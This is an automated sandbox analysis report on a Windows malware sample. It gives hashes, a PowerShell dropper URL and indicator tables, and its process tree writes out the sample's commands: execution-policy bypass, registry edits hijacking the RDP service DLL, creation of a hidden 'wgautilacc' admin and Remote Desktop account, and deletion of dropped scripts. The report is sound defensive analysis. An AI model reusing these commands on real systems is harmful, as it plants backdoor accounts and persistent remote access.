046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211

Analysis

max time kernel
73s
max time network
75s
platform
windows10_x64
resource
win10v20210408
submitted
23-09-2021 10:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f71c575754e1f5890ad8b35afd08b8be.exe
Size

5.9MB
MD5

f71c575754e1f5890ad8b35afd08b8be
SHA1

69803b96f3820fabd81c79d422a1fa2a72ccb699
SHA256

046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211
SHA512

32f7fab593c46efe2586825aff79688e4a688735bf950b351fe3bdffc4a9dff01da0b2d4a92acf4d4bd14aac362884bd264beced9e8b82fd3111e8ef8ef31301

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	Process
9	1824	powershell.exe
11	1824	powershell.exe
12	1824	powershell.exe
13	1824	powershell.exe
15	1824	powershell.exe
17	1824	powershell.exe
19	1824	powershell.exe
21	1824	powershell.exe
23	1824	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000600000001ab48-361.dat	upx
behavioral2/files/0x000600000001ab49-362.dat	upx

Loads dropped DLL 2 IoCs

Processes:

pid	Process
2608
2608

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE80A.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE84B.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ijrfa1zy.a44.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE78C.tmp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE81B.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE85B.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_pkrljybx.gjw.psm1	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
2732	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
1268	powershell.exe
1268	powershell.exe
1268	powershell.exe
4020	powershell.exe
4020	powershell.exe
4020	powershell.exe
3896	powershell.exe
3896	powershell.exe
3896	powershell.exe
3996	powershell.exe
3996	powershell.exe
3996	powershell.exe
1268	powershell.exe
1268	powershell.exe
1268	powershell.exe
1824	powershell.exe
1824	powershell.exe
1824	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
620
620

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

f71c575754e1f5890ad8b35afd08b8be.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	636	f71c575754e1f5890ad8b35afd08b8be.exe
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeIncreaseQuotaPrivilege	4020	powershell.exe
Token: SeSecurityPrivilege	4020	powershell.exe
Token: SeTakeOwnershipPrivilege	4020	powershell.exe
Token: SeLoadDriverPrivilege	4020	powershell.exe
Token: SeSystemProfilePrivilege	4020	powershell.exe
Token: SeSystemtimePrivilege	4020	powershell.exe
Token: SeProfSingleProcessPrivilege	4020	powershell.exe
Token: SeIncBasePriorityPrivilege	4020	powershell.exe
Token: SeCreatePagefilePrivilege	4020	powershell.exe
Token: SeBackupPrivilege	4020	powershell.exe
Token: SeRestorePrivilege	4020	powershell.exe
Token: SeShutdownPrivilege	4020	powershell.exe
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeSystemEnvironmentPrivilege	4020	powershell.exe
Token: SeRemoteShutdownPrivilege	4020	powershell.exe
Token: SeUndockPrivilege	4020	powershell.exe
Token: SeManageVolumePrivilege	4020	powershell.exe
Token: 33	4020	powershell.exe
Token: 34	4020	powershell.exe
Token: 35	4020	powershell.exe
Token: 36	4020	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeIncreaseQuotaPrivilege	3896	powershell.exe
Token: SeSecurityPrivilege	3896	powershell.exe
Token: SeTakeOwnershipPrivilege	3896	powershell.exe
Token: SeLoadDriverPrivilege	3896	powershell.exe
Token: SeSystemProfilePrivilege	3896	powershell.exe
Token: SeSystemtimePrivilege	3896	powershell.exe
Token: SeProfSingleProcessPrivilege	3896	powershell.exe
Token: SeIncBasePriorityPrivilege	3896	powershell.exe
Token: SeCreatePagefilePrivilege	3896	powershell.exe
Token: SeBackupPrivilege	3896	powershell.exe
Token: SeRestorePrivilege	3896	powershell.exe
Token: SeShutdownPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeSystemEnvironmentPrivilege	3896	powershell.exe
Token: SeRemoteShutdownPrivilege	3896	powershell.exe
Token: SeUndockPrivilege	3896	powershell.exe
Token: SeManageVolumePrivilege	3896	powershell.exe
Token: 33	3896	powershell.exe
Token: 34	3896	powershell.exe
Token: 35	3896	powershell.exe
Token: 36	3896	powershell.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeIncreaseQuotaPrivilege	3996	powershell.exe
Token: SeSecurityPrivilege	3996	powershell.exe
Token: SeTakeOwnershipPrivilege	3996	powershell.exe
Token: SeLoadDriverPrivilege	3996	powershell.exe
Token: SeSystemProfilePrivilege	3996	powershell.exe
Token: SeSystemtimePrivilege	3996	powershell.exe
Token: SeProfSingleProcessPrivilege	3996	powershell.exe
Token: SeIncBasePriorityPrivilege	3996	powershell.exe
Token: SeCreatePagefilePrivilege	3996	powershell.exe
Token: SeBackupPrivilege	3996	powershell.exe
Token: SeRestorePrivilege	3996	powershell.exe
Token: SeShutdownPrivilege	3996	powershell.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeSystemEnvironmentPrivilege	3996	powershell.exe
Token: SeRemoteShutdownPrivilege	3996	powershell.exe
Token: SeUndockPrivilege	3996	powershell.exe
Token: SeManageVolumePrivilege	3996	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f71c575754e1f5890ad8b35afd08b8be.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exenet.execmd.exenet.execmd.exenet.execmd.execmd.exe

description	pid	Process	procid_target
PID 636 wrote to memory of 1268	636	f71c575754e1f5890ad8b35afd08b8be.exe	68
PID 636 wrote to memory of 1268	636	f71c575754e1f5890ad8b35afd08b8be.exe	68
PID 1268 wrote to memory of 2376	1268	powershell.exe	70
PID 1268 wrote to memory of 2376	1268	powershell.exe	70
PID 2376 wrote to memory of 2608	2376	csc.exe	71
PID 2376 wrote to memory of 2608	2376	csc.exe	71
PID 1268 wrote to memory of 4020	1268	powershell.exe	72
PID 1268 wrote to memory of 4020	1268	powershell.exe	72
PID 1268 wrote to memory of 3896	1268	powershell.exe	75
PID 1268 wrote to memory of 3896	1268	powershell.exe	75
PID 1268 wrote to memory of 3996	1268	powershell.exe	77
PID 1268 wrote to memory of 3996	1268	powershell.exe	77
PID 1268 wrote to memory of 2716	1268	powershell.exe	79
PID 1268 wrote to memory of 2716	1268	powershell.exe	79
PID 1268 wrote to memory of 2732	1268	powershell.exe	80
PID 1268 wrote to memory of 2732	1268	powershell.exe	80
PID 1268 wrote to memory of 2736	1268	powershell.exe	81
PID 1268 wrote to memory of 2736	1268	powershell.exe	81
PID 1268 wrote to memory of 3980	1268	powershell.exe	84
PID 1268 wrote to memory of 3980	1268	powershell.exe	84
PID 3980 wrote to memory of 696	3980	net.exe	85
PID 3980 wrote to memory of 696	3980	net.exe	85
PID 1268 wrote to memory of 2272	1268	powershell.exe	86
PID 1268 wrote to memory of 2272	1268	powershell.exe	86
PID 2272 wrote to memory of 4092	2272	cmd.exe	87
PID 2272 wrote to memory of 4092	2272	cmd.exe	87
PID 4092 wrote to memory of 772	4092	cmd.exe	88
PID 4092 wrote to memory of 772	4092	cmd.exe	88
PID 772 wrote to memory of 3880	772	net.exe	89
PID 772 wrote to memory of 3880	772	net.exe	89
PID 1268 wrote to memory of 3148	1268	powershell.exe	90
PID 1268 wrote to memory of 3148	1268	powershell.exe	90
PID 3148 wrote to memory of 3996	3148	cmd.exe	91
PID 3148 wrote to memory of 3996	3148	cmd.exe	91
PID 3996 wrote to memory of 1324	3996	cmd.exe	92
PID 3996 wrote to memory of 1324	3996	cmd.exe	92
PID 1324 wrote to memory of 1672	1324	net.exe	93
PID 1324 wrote to memory of 1672	1324	net.exe	93
PID 2720 wrote to memory of 1016	2720	cmd.exe	97
PID 2720 wrote to memory of 1016	2720	cmd.exe	97
PID 1016 wrote to memory of 1908	1016	net.exe	98
PID 1016 wrote to memory of 1908	1016	net.exe	98
PID 2692 wrote to memory of 3704	2692	cmd.exe	101
PID 2692 wrote to memory of 3704	2692	cmd.exe	101
PID 3704 wrote to memory of 1824	3704	net.exe	102
PID 3704 wrote to memory of 1824	3704	net.exe	102
PID 2736 wrote to memory of 3584	2736	cmd.exe	105
PID 2736 wrote to memory of 3584	2736	cmd.exe	105
PID 3584 wrote to memory of 3596	3584	net.exe	106
PID 3584 wrote to memory of 3596	3584	net.exe	106
PID 4020 wrote to memory of 2540	4020	net.exe	110
PID 4020 wrote to memory of 2540	4020	net.exe	110
PID 2004 wrote to memory of 3588	2004	cmd.exe	113
PID 2004 wrote to memory of 3588	2004	cmd.exe	113
PID 3588 wrote to memory of 3060	3588	net.exe	114
PID 3588 wrote to memory of 3060	3588	net.exe	114
PID 1812 wrote to memory of 3888	1812	cmd.exe	117
PID 1812 wrote to memory of 3888	1812	cmd.exe	117
PID 3888 wrote to memory of 1008	3888	net.exe	118
PID 3888 wrote to memory of 1008	3888	net.exe	118
PID 808 wrote to memory of 2888	808	cmd.exe	121
PID 808 wrote to memory of 2888	808	cmd.exe	121
PID 3264 wrote to memory of 724	3264	cmd.exe	124
PID 3264 wrote to memory of 724	3264	cmd.exe	124

C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe
"C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1268
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\43vvo1jn\43vvo1jn.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2376
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DF5.tmp" "c:\Users\Admin\AppData\Local\Temp\43vvo1jn\CSC732EA7F145834E02AFF745DCAD2D37AF.TMP"
      4⤵
      PID:2608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3996
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2716
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:2732
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2736
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3980
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:696
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2272
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4092
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:772
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3880
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3148
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3996
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1324
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1672
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1860
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:3728

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:1908

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc kEE2SQbH /add
1⤵
- Suspicious use of WriteProcessMemory
PID:2692
- C:\Windows\system32\net.exe
  net.exe user wgautilacc kEE2SQbH /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc kEE2SQbH /add
    3⤵
    PID:1824

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:3596

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
1⤵
PID:4032
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    3⤵
    PID:2540

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3588
